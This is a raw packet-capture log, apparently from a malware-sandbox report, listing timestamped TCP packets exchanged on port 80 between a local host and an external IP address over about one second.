                                                                                              Oct 30, 2024 19:47:05.730999947 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731009960 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731040001 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731054068 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731102943 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731112957 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731122971 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731162071 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731162071 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731261015 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731271029 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731283903 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731296062 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731322050 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731342077 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731379032 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731553078 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731585026 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731594086 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731597900 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731626034 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731652021 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731713057 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731724024 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731734037 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731746912 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.731753111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731771946 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.731790066 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732319117 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732331038 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732342005 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732361078 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732378006 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732386112 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732569933 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732610941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732615948 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732628107 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732650042 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732671976 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732731104 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732742071 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732752085 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732765913 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732770920 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732785940 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732796907 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.732943058 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.732979059 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.733000994 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.733014107 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.733023882 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.733035088 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.733050108 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.733063936 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.819705009 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.819757938 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.819789886 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.819797993 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.819829941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.819852114 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848088980 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848138094 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848174095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848186970 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848208904 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848212004 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848222017 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848243952 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848248959 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848278999 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848290920 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848320961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848321915 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848355055 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848365068 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848393917 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848411083 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848444939 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848453999 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848479033 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848486900 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848526955 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848531008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848566055 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848572016 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848598957 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848602057 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848634005 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848637104 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848668098 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848673105 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848706007 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848722935 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848758936 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848758936 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848795891 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848803043 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848839998 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848845005 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848876953 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848900080 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848934889 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848942041 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.848969936 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.848974943 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849004984 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849008083 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849051952 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849059105 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849091053 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849096060 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849126101 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849129915 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849157095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849164009 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849186897 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849210978 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849245071 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849252939 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849278927 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849281073 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849314928 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849322081 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849344969 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849353075 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849383116 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849395037 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849430084 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849441051 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849464893 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849471092 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849503994 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849519968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849551916 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849561930 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849587917 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849595070 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849625111 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849627018 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849661112 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849663973 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849695921 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849699974 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849730015 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849733114 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849765062 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849770069 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849801064 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.849802971 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.849836111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.936781883 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.936832905 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.936872005 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.936908960 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.936954021 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964390993 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964449883 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964452028 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964487076 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964490891 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964520931 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964528084 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964557886 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964562893 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964592934 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964612007 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964643955 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964648008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964683056 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964682102 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964719057 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964720964 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964759111 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964772940 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964809895 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964812994 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964845896 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964848995 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964884996 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964905024 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964946985 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.964962959 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.964999914 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965006113 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965034008 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965039968 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965073109 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965087891 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965125084 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965128899 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965166092 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965193987 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965234995 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965249062 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965291023 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965303898 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965337992 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965344906 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965375900 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965379000 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965409994 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965416908 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965459108 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965477943 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965513945 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965516090 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965543985 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965563059 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965584993 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965621948 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965667009 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965676069 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965707064 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965714931 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965745926 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965795040 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965831995 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965832949 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965868950 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965874910 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965908051 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965938091 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.965982914 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.965991974 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966025114 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966032028 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966063976 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966195107 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966236115 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966247082 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966281891 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966286898 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966319084 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966324091 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966356039 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966357946 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966397047 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966413021 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966447115 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966450930 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966483116 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966492891 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966521025 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966551065 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966592073 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966604948 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966639996 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966648102 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966677904 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966706991 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966747046 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966762066 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966794968 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:05.966806889 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:05.966836929 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.053683996 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.053730011 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.053769112 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.053818941 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.053853035 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081392050 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081443071 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081453085 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081484079 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081566095 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081583977 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081597090 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081607103 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081607103 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081620932 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081621885 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081638098 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081657887 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081768990 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081779957 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081790924 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081804037 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081805944 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081816912 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081821918 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081828117 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.081846952 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081865072 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.081995010 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082031965 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082037926 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082050085 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082073927 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082089901 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082350016 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082361937 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082376003 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082380056 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082386971 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082398891 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082410097 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082456112 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082457066 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082530975 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082572937 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082607031 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082617998 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082628012 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082638979 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082648039 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082672119 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082688093 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082700014 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082724094 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082753897 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082765102 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082775116 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082792044 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082812071 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082870960 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082906961 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082937002 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082948923 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.082974911 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.082988977 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083065033 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083076000 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083086014 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083102942 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083117962 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083270073 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083281994 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083292961 CET804973045.91.200.39192.168.2.4
                                                                                              Oct 30, 2024 19:47:06.083307028 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083328962 CET4973080192.168.2.445.91.200.39
                                                                                              Oct 30, 2024 19:47:06.083400965 CET804973045.91.200.39192.168.2.4
